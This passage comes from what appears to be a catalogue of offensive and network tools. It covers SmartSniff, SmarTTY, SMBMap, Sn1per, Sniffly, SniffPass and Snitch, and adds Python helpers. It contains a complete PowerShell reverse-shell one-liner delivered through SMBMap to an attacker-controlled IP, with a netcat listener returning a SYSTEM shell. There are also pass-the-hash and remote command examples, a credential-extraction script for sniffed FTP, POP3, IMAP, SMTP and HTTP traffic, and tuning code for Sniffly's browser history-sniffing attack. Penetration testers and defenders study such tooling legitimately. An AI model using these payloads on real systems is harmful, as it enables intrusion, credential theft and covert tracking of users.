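        raise ValueError(f"bad protocol: {text!r}")
    if len(parts) == 3:
        return Filter(action, side, PROTOS[proto], "any")
    if parts[3] == "":                      # "include:remote:tcp:" is a split filter, not "any"
        raise ValueError(f"empty range: {text!r}")
    lo_s, _, hi_s = parts[3].partition("-")
    hi_s = hi_s or lo_s                     # a single value is the range value-value
    if "." in lo_s:                         # assumption: dotted text is an IPv4 range
        lo, hi = (int(ipaddress.IPv4Address(s)) for s in (lo_s, hi_s))
        kind = "ip"
    else:
        lo, hi = int(lo_s), int(hi_s)
        if not (0 <= lo <= 65535 and 0 <= hi <= 65535):
            raise ValueError(f"port out of range: {text!r}")
        kind = "port"
    if lo > hi:
        raise ValueError(f"range start above end: {text!r}")
    return Filter(action, side, PROTOS[proto], kind, lo, hi)


def parse_filters(text):
    """Filter strings are separated by spaces or CRLF, so a plain split() tokenises them."""
    return [parse_filter(tok) for tok in text.split()]


def _matches(f, pkt):
    if pkt["proto"] not in f.protos:
        return False
    if f.kind == "any":
        return True
    sides = ("local", "remote") if f.side == "both" else (f.side,)
    for side in sides:
        if f.kind == "port":
            if pkt["proto"] == "icmp":      # ICMP has no ports: a port filter never matches it
                continue
            value = pkt[side + "_port"]
        else:
            value = int(ipaddress.IPv4Address(pkt[side + "_ip"]))
        if f.lo <= value <= f.hi:
            return True
    return False


def passes(filters, pkt):
    """Assumed rule: any include filters form a whitelist, exclude filters then veto."""
    includes = [f for f in filters if f.action == "include"]
    if includes and not any(_matches(f, pkt) for f in includes):
        return False
    return not any(_matches(f, pkt) for f in filters if f.action == "exclude")


# Constructed sample conversations (not real capture data).
PACKETS = [
    {"proto": "tcp", "local_ip": "10.0.0.5", "local_port": 51000, "remote_ip": "93.184.216.34", "remote_port": 80},
    {"proto": "udp", "local_ip": "10.0.0.5", "local_port": 53124, "remote_ip": "10.0.0.1", "remote_port": 53},
    {"proto": "tcp", "local_ip": "10.0.0.5", "local_port": 6881, "remote_ip": "192.168.0.50", "remote_port": 6881},
    {"proto": "icmp", "local_ip": "10.0.0.5", "remote_ip": "192.168.0.50"},
]


def apply_filter(filter_text, packets=PACKETS):
    """Indexes of the packets that the filter text lets through."""
    filters = parse_filters(filter_text)
    return [i for i, pkt in enumerate(packets) if passes(filters, pkt)]


def is_valid_filter(text):
    try:
        parse_filters(text)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for text in ("include:remote:tcp:80", "include:both:tcpudp:53-139", "exclude:both:icmp"):
        print(f"{text:30} -> packets {apply_filter(text)}")
```

Run the six filter strings from the documentation through apply_filter to see which of the four sample conversations each one keeps; the port-range example keeps both the web and the DNS conversation because 80 also lies inside 53-139.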


Live Mode

Starting from version 1.10, a new option was added to the 'Advanced Options' section: 'Live Mode'. When SmartSniff captures packets in live mode, the TCP/IP conversations list is updated while capturing the packets, instead of updating it only after the capture is finished. Be aware that "Live Mode" requires more CPU resources than non-live mode. So if your computer is slow, or you have very high traffic on your network, it's recommended to turn off this option.
Starting from version 1.20, you can also view the content of each TCP/IP conversation (in the lower pane) while capturing the packets. However, if the TCP/IP conversation is too large, you won't be able to watch the entire TCP/IP conversation until the capture is stopped.
Viewing process information

Starting from version 1.30, you can view the process information (ProcessID and process filename) for captured TCP packets. However, this feature has some limitations and problems:
Process information is only displayed for TCP packets (it doesn't work with UDP).
Process information may not be displayed for TCP connections that closed after a short period of time.
Retrieving process information consumes more CPU resources and may slow down your computer. It's not recommended to use this feature if you have intensive network traffic.
Process information is currently not saved in the .ssp file.
In order to activate this feature, go to the 'Advanced Options' dialog box, check the "Retrieve process information while capturing packets" option and click the 'OK' button. 2 new columns will be added: ProcessID and Process Filename. Start capturing, and process information will be displayed for the captured TCP conversations.
The structure of the .ssp file (SmartSniff Packets File)

The structure of the .ssp file saved by SmartSniff is very simple. It contains one main header at the beginning of the file, followed by a sequence of all TCP/IP packets, each of them beginning with a small header.
The main header structure:
00 - SMSNF200 signature.
08 - (2 bytes) The number of bytes in the header (currently 4 bytes for the IP Address)
0A - (4 bytes) IP Address
Header of each packet:
00 (2 Bytes) packet header size (currently 0x18 bytes)
02 (4 Bytes) number of received bytes in packet.
06 (8 Bytes) Packet time in Windows FILETIME format.
0E (6 Bytes) Source MAC Address.
14 (6 Bytes) Dest. MAC Address.
1A The remaining bytes are the TCP/IP packet itself.
Note that both size fields count the bytes that follow them, not the size field itself: 0x18 = 24 = 4 + 8 + 6 + 6, which is why the packet data starts at offset 0x1A, and the first packet header starts at 0x0E.
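Added example (Python; my own code, not NirSoft's, whose source is closed): a parser for the .ssp layout described above, with a small writer used only to construct the sample image in memory. Assumptions not stated on the page: integers are little-endian (Windows native), and each size field counts the bytes that follow it, so a packet's data starts at 2 + header size and the packet stream at 10 + main header size. FILETIME is converted using its 1601-01-01 UTC epoch in 100 ns ticks. The two packets and their placeholder payloads are constructed; a real file holds raw IP packets there.

```python
import struct
from datetime import datetime, timedelta, timezone

SIGNATURE = b"SMSNF200"
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft):
    """FILETIME counts 100-nanosecond ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def mac_to_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_ssp(data):
    """Return (capture_ip, packets) for an .ssp image held in memory.

    Assumed: little-endian integers and size fields that count the bytes
    following them, so packet data begins at 2 + header_size.
    """
    if data[:8] != SIGNATURE:
        raise ValueError("not an SMSNF200 file")
    (hdr_len,) = struct.unpack_from("<H", data, 8)
    if hdr_len < 4 or len(data) < 10 + hdr_len:
        raise ValueError("main header too short or truncated")
    capture_ip = ".".join(str(b) for b in data[10:14])
    pos = 10 + hdr_len                      # any extra main-header bytes are skipped
    packets = []
    while pos < len(data):
        if len(data) - pos < 2:
            raise ValueError("truncated packet header")
        (phdr_len,) = struct.unpack_from("<H", data, pos)
        if phdr_len < 24 or len(data) - pos < 2 + phdr_len:
            raise ValueError(f"bad packet header at offset {pos}")
        length, ft = struct.unpack_from("<IQ", data, pos + 2)   # offsets 02 and 06
        start = pos + 2 + phdr_len
        if start + length > len(data):
            raise ValueError(f"packet at offset {pos} runs past end of file")
        packets.append({
            "time": filetime_to_datetime(ft),
            "src_mac": mac_to_str(data[pos + 14:pos + 20]),    # offset 0E
            "dst_mac": mac_to_str(data[pos + 20:pos + 26]),    # offset 14
            "payload": bytes(data[start:start + length]),
        })
        pos = start + length
    return capture_ip, packets


def build_ssp(ip, packets):
    """Write the same layout; used here only to construct the sample file."""
    out = bytearray(SIGNATURE) + struct.pack("<H", 4) + bytes(int(o) for o in ip.split("."))
    for ft, src, dst, payload in packets:
        out += struct.pack("<HIQ", 24, len(payload), ft) + src + dst + payload
    return bytes(out)


# Constructed sample: two packets with placeholder payloads (a real file holds raw IP packets).
T0 = datetime(2015, 4, 29, 13, 15, 25, tzinfo=timezone.utc)
SAMPLE = build_ssp("192.168.0.5", [
    (datetime_to_filetime(T0), bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb"),
     b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"),
    (datetime_to_filetime(T0 + timedelta(seconds=1)), bytes.fromhex("66778899aabb"),
     bytes.fromhex("001122334455"), b"HTTP/1.1 200 OK\r\n\r\n"),
])


def is_truncated(data):
    """True when the image fails structural validation (e.g. a capture cut short)."""
    try:
        parse_ssp(data)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    ip, pkts = parse_ssp(SAMPLE)
    print(f"capture host {ip}, {len(pkts)} packets")
    for p in pkts:
        print(p["time"].isoformat(), p["src_mac"], "->", p["dst_mac"], len(p["payload"]), "bytes")
```

Every length field is checked against the remaining bytes before it is used as a slice bound, so a file that was cut short mid-packet (or a crafted one) raises ValueError rather than yielding a silently truncated last packet.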

Download SmartSniff v2.17
SMARTTY - MULTI-TABBED SSH CLIENT WITH SCP SUPPORT

SmarTTY is a free multi-tabbed SSH client that supports copying files and directories with SCP on-the-fly and editing files in-place.
One SSH session - multiple tabs

Most SSH servers support up to 10 sub-sessions per connection (OpenSSH's default MaxSessions). SmarTTY makes the best of it: no annoying multiple windows, no need to relogin, just open a new tab and go!

Transfer files and whole directories

Explore remote directory structure with Windows-style GUI
Download and upload single files with SCP protocol
Transfer entire directories with recursive SCP
Quickly send and receive directories with on-the-fly TAR

Edit files in-place

Select "File->Open" to open an editor tab for a remote file:
Native Windows file editing look & feel
Automatic CRLF to LF conversion
Option to invoke 'sudo' to save protected files

Built-in hex terminal for COM ports

Simply select "Setup new serial or TCP connection" to conveniently communicate with your embedded device:
View data in ASCII, HEX or both
Save communication logs to files
Automatically group data packets based on time of arrival

Out-of-the-box public-key auth

SmarTTY can automatically configure public key authentication for selected remote computers:
No need to enter your password each time
Private key is securely stored in Windows key container
One-click configuration of remote host
Your Unix password is not stored anywhere

Run graphical applications seamlessly

SmarTTY comes with a pre-built XMing X11 server. The server will be configured and started on-the-fly as soon as you launch a graphical application in the terminal:
Remote X11 apps run out-of-the-box
No need to configure anything manually

Download SmarTTY

SMBMAP - SAMBA SHARE ENUMERATOR

SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands. This tool was designed with pen testing in mind, and is intended to simplify searching for potentially sensitive data across large networks.
Some of the features have not been thoroughly tested, so changes will be forthcoming as bugs are found. I only really find and fix the bugs while I'm on engagements, so progress is a bit slow. Any feedback or bug reports would be appreciated. It's definitely rough around the edges, but I'm just trying to pack in features at the moment. Version 2.0 should clean up the code a lot... whenever that actually happens ;). Thanks for checking it out!! Planned features include simple remote shell (instead of the god awful powershell script in the examples), actual logging, shadow copying ntds.dit automation (Win7 and up only..for now), threading, other things.
Features:

Pass-the-Hash Support
File upload/download/delete
Permission enumeration (writable share, meet Metasploit)
Remote Command Execution
Distributed file content searching (new!)
File name matching (with an auto download capability)

Help
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com

optional arguments:
  -h, --help              show this help message and exit

Main arguments:
  -H HOST                 IP of host
  --host-file FILE        File containing a list of hosts
  -u USERNAME             Username, if omitted null session assumed
  -p PASSWORD             Password or NTLM hash
  -s SHARE                Specify a share (default C$), ex 'C$'
  -d DOMAIN               Domain name (default WORKGROUP)
  -P PORT                 SMB port (default 445)

Command Execution:
  Options for executing commands on the specified host
  -x COMMAND              Execute a command ex. 'ipconfig /r'

Filesystem Search:
  Options for searching/enumerating the filesystem of the specified host
  -L                      List all drives on the specified host
  -R [PATH]               Recursively list dirs, and files (no share\path lists ALL shares), ex. 'C$\Finance'
  -r [PATH]               List contents of directory, default is to list root of all shares, ex. -r 'C$\Documents and Settings\Administrator\Documents'
  -A PATTERN              Define a file name pattern (regex) that auto downloads a file on a match (requires -R or -r), not case sensitive, ex '(web|global).(asax|config)'
  -q                      Disable verbose output (basically only really useful with -A)

File Content Search:
  Options for searching the content of files
  -F PATTERN              File content search, -F '[Pp]assword' (requires admin access to execute commands, and powershell on victim host)
  --search-path PATH      Specify drive/path to search (used with -F, default C:\Users), ex 'D:\HR\'

Filesystem interaction:
  Options for interacting with the specified host's filesystem
  --download PATH         Download a file from the remote system, ex. 'C$\temp\passwords.txt'
  --upload SRC DST        Upload a file to the remote system ex. '/tmp/payload.exe C$\temp\payload.exe'
  --delete PATH TO FILE   Delete a remote file, ex. 'C$\temp\msf.exe'
  --skip                  Skip delete file confirmation prompt
Examples:
$ python smbmap.py -u jsmith -p password1 -d workgroup -H 192.168.0.1
$ python smbmap.py -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d' -H 172.16.0.20
$ python smbmap.py -u 'apadmin' -p 'asdf1234!' -d ACME -H 10.1.3.30 -x 'net group "Domain Admins" /domain'

The second example is pass-the-hash: -p takes the LM:NT hash pair as dumped from SAM or NTDS. The LM half aad3b435b51404eeaad3b435b51404ee is the LM hash of the empty string, which is what Windows stores when LM hashing is disabled, so only the NT half carries the credential.

Default Output:
$ python smbmap.py --host-file smb-hosts.txt -u jsmith -p 'R33nisP!nckl3' -d ABC
[+] Reading from stdin
[+] Finding open SMB ports....
[+] User SMB session establishd...
[+] IP: 192.168.0.5:445  Name: unkown
        Disk            Permissions
        ----            -----------
        ADMIN$          READ, WRITE
        C$              READ, WRITE
        IPC$            NO ACCESS
        TMPSHARE        READ, WRITE
[+] User SMB session establishd...
[+] IP: 192.168.2.50:445  Name: unkown
        Disk            Permissions
        ----            -----------
        ADMIN$          READ, WRITE
        C$              READ, WRITE
        IPC$            NO ACCESS
        print$          READ, WRITE
        My Dirs         NO ACCESS
        WWWROOT_OLD     NO ACCESS

Command execution:
$ python smbmap.py -u ariley -p 'P@$$w0rd1234!' -d ABC -x 'net group "Domain Admins" /domain' -H 192.168.2.50
[+] Finding open SMB ports....
[+] User SMB session establishd...
[+] IP: 192.168.2.50:445  Name: unkown
Group name     Domain Admins
Comment        Designated administrators of the domain

Members
-------------------------------------------------------------------------------
abcadmin
The command completed successfully.

Non recursive path listing (ls):

$ python smbmap.py -H 172.16.0.24 -u Administrator -p 'changeMe' -r 'C$\Users'
[+] Finding open SMB ports....
[+] User SMB session establishd...
[+] IP: 172.16.0.24:445  Name: 172.16.0.24
        Disk            Permissions
        ----            -----------
        C$              READ, WRITE
        .\Users
        dw--w--w--        0 Wed Apr 29 13:15:25 2015    .
        dw--w--w--        0 Wed Apr 29 13:15:25 2015    ..
        dr--r--r--        0 Wed Apr 22 14:50:36 2015    Administrator
        dr--r--r--        0 Thu Apr  9 14:46:57 2015    All Users
        dw--w--w--        0 Thu Apr  9 14:46:49 2015    Default
        dr--r--r--        0 Thu Apr  9 14:46:57 2015    Default User
        fr--r--r--      174 Thu Apr  9 14:44:01 2015    desktop.ini
        dw--w--w--        0 Thu Apr  9 14:46:49 2015    Public
        dr--r--r--        0 Wed Apr 22 13:33:01 2015    wingus

File Content Searching:

$ python smbmap.py -H 192.168.1.203 -u Administrator -p p00p1234! -F password --search-path 'C:\Users\wingus\AppData\Roaming'
[!] Missing domain...defaulting to WORKGROUP
[+] Finding open SMB ports....
[+] User SMB session establishd...
[+] IP: 192.168.1.203:445  Name: unkown
[+] File search started on 1 hosts...this could take a while
[+] Job 861d4cd845124cad95d42175 started on 192.168.1.203, result will be stored at C:\Windows\TEMP\861d4cd845124cad95d42175.txt
[+] Grabbing search results, be patient, share drives tend to be big...
[+] Job 1 of 1 completed
[+] All jobs complete
Host: 192.168.1.203    Pattern: password
C:\Users\wingus\AppData\Roaming\Mozilla\Firefox\Profiles\35msadwm.default\logins.json
C:\Users\wingus\AppData\Roaming\Mozilla\Firefox\Profiles\35msadwm.default\prefs.js

Note that the password above is passed unquoted; in an interactive bash session a trailing ! triggers history expansion, so quote such passwords in single quotes as the other examples do.

Drive Listing:

This feature was added to complement the file content searching feature.
$ python smbmap.py -H 192.168.1.24 -u Administrator -p 'R33nisP!nckle' -L
[!] Missing domain...defaulting to WORKGROUP
[+] Finding open SMB ports....
[+] User SMB session establishd...
[+] IP: 192.168.1.24:445  Name: unkown
[+] Host 192.168.1.24 Local Drives: C:\ D:\
[+] Host 192.168.1.24 Net Drive(s):
        E:      \\vboxsrv\Public        VirtualBox Shared Folders

Nifty Shell:

Run a PowerShell reverse shell on the victim SMB host (change the IP in the code to your IP address, i.e. where the shell connects back to). The one-liner below defines ReverseShellClean and calls it whenever the TCP connection drops or cmd.exe exits:
$ python smbmap.py -u jsmith -p 'R33nisP!nckle' -d ABC -H 192.168.2.50 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.153""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize ;$p=New-Object System.Diagnostics.Process ;$p.StartInfo.FileName=""""cmd.exe"""" ;$p.StartInfo.RedirectStandardInput=1 ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0 ;$p.Start() ;$is=$p.StandardInput ;$os=$p.StandardOutput ;Start-Sleep 1 ;$e=new-object System.Text.AsciiEncoding ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length) ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {ReverseShellClean} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else { $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}} $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"'
[+] Finding open SMB ports....
[+] User SMB session establishd...
[+] IP: 192.168.2.50:445  Name: unkown
[!] Error encountered, sharing violation, unable to retrieve output

Attacker's Netcat Listener:
$ nc -l 4445
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

Download SMBMap
SN1PER - AUTOMATED PENTEST RECON SCANNER
Sn1per is an automated scanner that can be used during a
penetration test to enumerate and scan for vulnerabilities.
Features

Automatically collects basic recon (i.e. whois, ping, DNS, etc.)
Automatically launches Google hacking queries against a
target domain
Automatically enumerates open ports
Automatically brute forces sub-domains and DNS info
Automatically runs targeted nmap scripts against open
ports
Automatically scans all web applications for common
vulnerabilities
Automatically brute forces all open services

Install
chmod +x install.sh
./install.sh

Installs all dependencies. Best run from Kali Linux.


Usage

./sn1per

SAMPLE REPORT:
https://gist.githubusercontent.com/1N3/070d14c364e5f23bfe5e/raw/8e152e740ba50cd49bb3366ec91cf7d08ca02715/Sn1per%2520Sample%2520Report

Download Sn1per
SNIFFLY - SNIFFING BROWSER HISTORY USING HSTS + CSP

Sniffly is an attack that abuses HTTP Strict Transport Security and Content Security Policy to allow arbitrary websites to sniff a user's browsing history. It has been tested in Firefox and Chrome.
More info available in my ToorCon 2015 slides: https://zyan.scripts.mit.edu/presentations/toorcon2015.pdf
Demo

Visit http://zyan.scripts.mit.edu/sniffly/ in Firefox/Chrome/Opera with HTTPS Everywhere disabled. If you use an ad blocker, a bunch of advertising domains will probably show up in the "Probably Visited" column (ignore them).

How it works

I recommend reading the inline comments in src/index.js to understand how Sniffly does a timing attack in both FF and Chrome without polluting the local HSTS store. tl;dr version:
1. User visits Sniffly page
2. Browser attempts to load images from various HSTS
domains over HTTP
3. Sniffly sets a CSP policy that restricts images to HTTP, so image sources are blocked before they are redirected to HTTPS. This is crucial! If the browser completed a request to the HTTPS site, it would receive the site's HSTS header, the domain would be recorded as HSTS in the victim's browser, and the attack would no longer be able to tell whether the user had visited it before Sniffly.
4. When an image gets blocked by CSP, its onerror handler
is called. In this case, the onerror handler does some
fancy tricks to time how long it took for the image to be
redirected from HTTP to HTTPS. If this time is on the
order of a millisecond, it was an HSTS redirect (no
network request was made), which means the user has
visited the image's domain before. If it's on the order of
100 milliseconds, then a network request probably
occurred, meaning that the user hasn't visited the image's
domain.
Finding HSTS hosts
To scrape an included list of sites (util/strict-transport-security.txt, courtesy Scott Helme) to determine which hosts send HSTS headers, do:
$ cd util
$ ./run.sh <number_of_batches> > results.log

where 1 batch is 100 sites. You can override util/strict-transport-security.txt with a different list, such as the full Alexa Top 1M, if you want.
To process and sort the results by max-age, excluding ones with max-age less than 1 day and ones that are preloaded:
$ cd util
$ ./process.py <results_file> > processed.log

Once that's done, you can copy the hosts from processed.log into src/index.js .
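Added example (Python; my own code, not Sniffly's process.py, whose input format the page does not show) of the selection step just described, run over constructed scan results with one "host<TAB>Strict-Transport-Security value" line per site. It drops hosts whose max-age is under a day, since their HSTS entry (and with it the history signal) expires quickly, and hosts carrying the preload directive, since a preloaded host takes the fast redirect path for every visitor and cannot distinguish "visited" from "not visited". Treating the preload directive as "preloaded" is an approximation; the authoritative answer is the browser's preload list.

```python
import json

# Constructed scan output, one "host<TAB>Strict-Transport-Security value" line per site.
# The line format is an assumption; Sniffly's own run.sh output may differ.
SAMPLE_RESULTS = """\
example.com\tmax-age=31536000; includeSubDomains
short.example\tmax-age=300
preloaded.example\tmax-age=63072000; includeSubDomains; preload
nohsts.example\t
broken.example\tmax-age=notanumber
year.example\tMAX-AGE=15768000
"""


def parse_sts(value):
    """Parse a Strict-Transport-Security value into (max_age, directives).

    Directive names are case-insensitive (RFC 6797). Returns None when the
    header is absent, lacks max-age, or max-age is not an integer.
    """
    directives = {}
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, val = part.partition("=")
        directives[name.strip().lower()] = val.strip().strip('"')
    if "max-age" not in directives:
        return None
    try:
        return int(directives["max-age"]), directives
    except ValueError:
        return None


def usable_hsts_hosts(results_text, min_age=86400):
    """Hosts worth probing: long-lived HSTS and not requesting preload, sorted by max-age."""
    hosts = []
    for line in results_text.splitlines():
        if not line.strip():
            continue
        host, _, header = line.partition("\t")
        parsed = parse_sts(header)
        if parsed is None:
            continue
        max_age, directives = parsed
        if max_age < min_age:          # entry expires too soon to hold history
            continue
        if "preload" in directives:    # always on the fast path: cannot reveal a visit
            continue
        hosts.append((host, max_age))
    hosts.sort(key=lambda item: item[1], reverse=True)
    return hosts


def hosts_as_js_array(hosts):
    """Render the host list as a JavaScript array literal for pasting into src/index.js."""
    return "[" + ", ".join(json.dumps(host) for host, _ in hosts) + "]"


if __name__ == "__main__":
    kept = usable_hsts_hosts(SAMPLE_RESULTS)
    for host, max_age in kept:
        print(f"{host:20} max-age={max_age}")
    print(hosts_as_js_array(kept))
```

A host with max-age=0 is also dropped, which is correct: RFC 6797 defines max-age=0 as an instruction to forget the HSTS entry, so it carries no history at all.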
Running sploitz
Visiting file:///path/to/sniffly/src/index.html in Chrome should just work. In Firefox, CSP policies delivered via the <meta> tag are apparently not supported yet, so you need to set up a local webserver to serve the CSP HTTP response header. My Nginx server block looks something like this:
server {
    listen 8081;
    server_name localhost;
    location / {
        root /path/to/sniffly/src;
        add_header Content-Security-Policy "img-src http:";
        index index.html;
    }
}

Or in .htaccess :
<IfModule mod_headers.c>
    Header set Content-Security-Policy "img-src http:"
</IfModule>

Or send the header via PHP. Paste this at the start of the script (and change the name to index.php):
<?php
$csp_rules = "img-src http:";
// Just to ensure maximum compatibility
header('X-WebKit-CSP: '.$csp_rules);
header('X-Content-Security-Policy: '.$csp_rules);
header('Content-Security-Policy: '.$csp_rules);
?>

Caveats

Not supported yet in Safari, IE, or Chrome on iOS.
Extensions such as HTTPS Everywhere will mess up results.
Doesn't work reliably in Tor Browser since timings are rounded to the nearest 100 milliseconds.
Users with a different HSTS preload list (e.g. due to having an older browser) may not see accurate results.

Acknowledgements

Scott Helme for an initial list of HSTS hosts that he had found so I didn't have to scan the entire Alexa 1M.
Chris Palmer for advising on how to file a privacy bug in Chrome.
Dan Kaminsky and WhiteOps for sponsoring the ToorCon trip where this was presented.
Jan Schaumann and Chris Rohlf for being early testers.
Everyone who let me sleep on their couch while I did this over my "vacation break". You know who you are!

Download Sniffly
SNIFFPASS - PASSWORD MONITORING/SNIFFING SOFTWARE (WEB/FTP/EMAIL)

SniffPass is a small password monitoring utility that listens to your network, captures the passwords that pass through your network adapter, and displays them on the screen instantly. SniffPass can capture the passwords of the following protocols: POP3, IMAP4, SMTP, FTP, and HTTP (basic authentication passwords).
You can use this utility to recover lost Web/FTP/Email passwords.
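Added example (Python; my own code, not SniffPass's, which is closed source and whose parsing the page does not describe) of what "capturing passwords" from these protocols amounts to: an extractor that pulls credentials out of a reassembled client-to-server stream for the exact protocols SniffPass lists. HTTP Basic credentials are base64 of user:password, SMTP AUTH PLAIN is base64 of authzid NUL authcid NUL password, and FTP, POP3 and IMAP4 send the password in the clear, so none of this is decryption. The sample stream is constructed; the malformed base64 line is there to show that a decode failure is skipped rather than crashing the sniffer.

```python
import base64
import binascii
import re

# Patterns for the cleartext authentication exchanges SniffPass lists.
HTTP_BASIC = re.compile(r"^(?:Proxy-)?Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)\s*$", re.I)
USER_CMD = re.compile(r"^USER\s+(\S+)\s*$", re.I)          # FTP and POP3
PASS_CMD = re.compile(r"^PASS\s+(\S+)\s*$", re.I)
IMAP_LOGIN = re.compile(r'^\S+\s+LOGIN\s+"?([^"\s]+)"?\s+"?([^"\s]+)"?\s*$', re.I)
SMTP_PLAIN = re.compile(r"^AUTH\s+PLAIN\s+([A-Za-z0-9+/=]+)\s*$", re.I)


def _b64(token):
    """Decode strictly; tokens that merely look like base64 are ignored."""
    try:
        return base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None


def extract_credentials(stream):
    """Return (protocol, user, password) tuples found in one client->server stream."""
    found = []
    pending_user = None                     # USER seen, waiting for the matching PASS
    for raw in stream.splitlines():
        line = raw.strip()
        if m := HTTP_BASIC.match(line):
            decoded = _b64(m.group(1))
            if decoded is not None and b":" in decoded:
                user, _, pw = decoded.decode("latin-1").partition(":")
                found.append(("http-basic", user, pw))
        elif m := USER_CMD.match(line):
            pending_user = m.group(1)
        elif m := PASS_CMD.match(line):
            if pending_user is not None:
                found.append(("ftp/pop3", pending_user, m.group(1)))
                pending_user = None
        elif m := IMAP_LOGIN.match(line):
            found.append(("imap4", m.group(1), m.group(2)))
        elif m := SMTP_PLAIN.match(line):
            decoded = _b64(m.group(1))
            parts = decoded.split(b"\0") if decoded is not None else []
            if len(parts) == 3:             # authzid \0 authcid \0 password
                found.append(("smtp-plain", parts[1].decode("latin-1"), parts[2].decode("latin-1")))
    return found


# Constructed sample stream: several client->server exchanges concatenated.
SAMPLE_STREAM = "\r\n".join([
    "GET /admin/ HTTP/1.1",
    "Host: intranet.example",
    "Authorization: Basic " + base64.b64encode(b"alice:Sup3rS3cret").decode(),
    "",
    "USER ftpuser",
    "PASS hunter2",
    "a001 LOGIN bob pa55w0rd",
    "AUTH PLAIN " + base64.b64encode(b"\0carol\0mailpass").decode(),
    "Authorization: Basic QUJD1",            # invalid base64 length: skipped, not a crash
    "USER orphan",                            # PASS never sent: nothing to report
])

if __name__ == "__main__":
    for proto, user, pw in extract_credentials(SAMPLE_STREAM):
        print(f"{proto:10} {user}:{pw}")
```

Feed it one conversation at a time, as SmartSniff presents them, rather than a raw packet dump: USER/PASS pairing is stateful, so interleaving two FTP sessions in one stream would mis-pair them.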
USING SNIFFPASS

In order to start using SniffPass, follow the instructions below:
1. Download and install the WinPcap capture driver or the Microsoft Network Monitor driver. You can also try to capture without any driver installation, simply by using the 'Raw Socket' capture method, but you should be aware that this method doesn't work properly on many systems.
2. Run the executable file of SniffPass (SniffPass.exe).
3. From the File menu, select "Start Capture", or simply click the green play button in the toolbar. If it's the first time that you use SniffPass, you'll be asked to select the capture method and the network adapter that you want to use. After you select the desired capture options, SniffPass listens to your network adapter, and instantly displays any password that it finds.
4. In order to verify that the password sniffing works on your system, go to the demo Web page at http://www.nirsoft.net/password_test and type 'demo' as user name and 'password' as the password. After typing the user name/password and clicking 'Ok', you should see a new line in the main window of SniffPass containing the user/password you typed.
GET PASSWORDS OF ANOTHER COMPUTER ON YOUR NETWORK?

Many people ask me whether SniffPass is able to get passwords from another computer on the same network. So here's the answer. In order to grab the passwords from other network computers:
1. You must use a simple hub to connect your computers to the network. All modern switches and routers forward a packet only to the port of its destination, so the computer that runs SniffPass will never "see" the passwords of other computers when you use a switch or a router (unless that traffic is steered to your port by other means, such as a mirror/SPAN port).
2. Your network card must be able to enter 'Promiscuous Mode'.
3. You must use WinPcap or the Network Monitor Driver as the capture method.
4. For wireless networks: most wireless network cards (or their device drivers) automatically filter the packets of other computers, so you won't be able to capture the passwords of other computers. However, starting from Windows Vista/7, you can capture passwords of wireless networks that are not encrypted, by using Wifi Monitor Mode and Network Monitor Driver 3.x.
For more information about capturing from wireless networks, read this blog post: How to capture data and passwords of unsecured wireless networks with SniffPass and SmartSniff
COMMAND-LINE OPTIONS

Command | Description
/NoCapDriver | Starts SniffPass without loading the WinPcap Capture Driver.
/NoReg | Starts SniffPass without loading/saving your settings to the Registry.

Download SniffPass
SNITCH - INFORMATION GATHERING VIA DORKS

Snitch is a tool which automates the dorking process for a specified domain. Using built-in dork categories, this tool helps gather information about a domain that can be found using search engines. It can be quite useful in the early phases of a pentest.
Examples
devil@hell:~/snitch/$ python snitch.py
Usage: snitch.py [options]

Options:
  -h, --help                          show this help message and exit
  -U [url], --url=[url]               domain(s) or domain extension(s) separated by comma *
  -D [type], --dork=[type]            dork type(s) separated by comma *
  -O [file], --output=[file]          output file
  -S [ip:port], --socks=[ip:port]     socks5 proxy
  -I [seconds], --interval=[seconds]  interval between requests, 2s by default
  -P [pages], --pages=[pages]         pages to retrieve, 10 by default
  -v                                  turn on verbosity

Dork types:
  info  | Information leak & Potential web bugs
  ext   | Sensitive extensions
  docs  | Documents & Messages
  files | Files & Directories
  soft  | Web software
  all   | All

Examples:
  snitch.py -I5 -P3 --dork=ext,info -U gov -S 127.0.0.1:9050
  snitch.py --url=site.com -D all -O /tmp/dorks

devil@hell:~/snitch/$ python snitch.py -U gov -D ext -P20 -S 127.0.0.1:9050
[+] Target: gov
[!] Using SOCKS5 (IP - XX.XX.XX.XX)
[!] Pages limit set to 20
[+] Looking for sensitive extensions
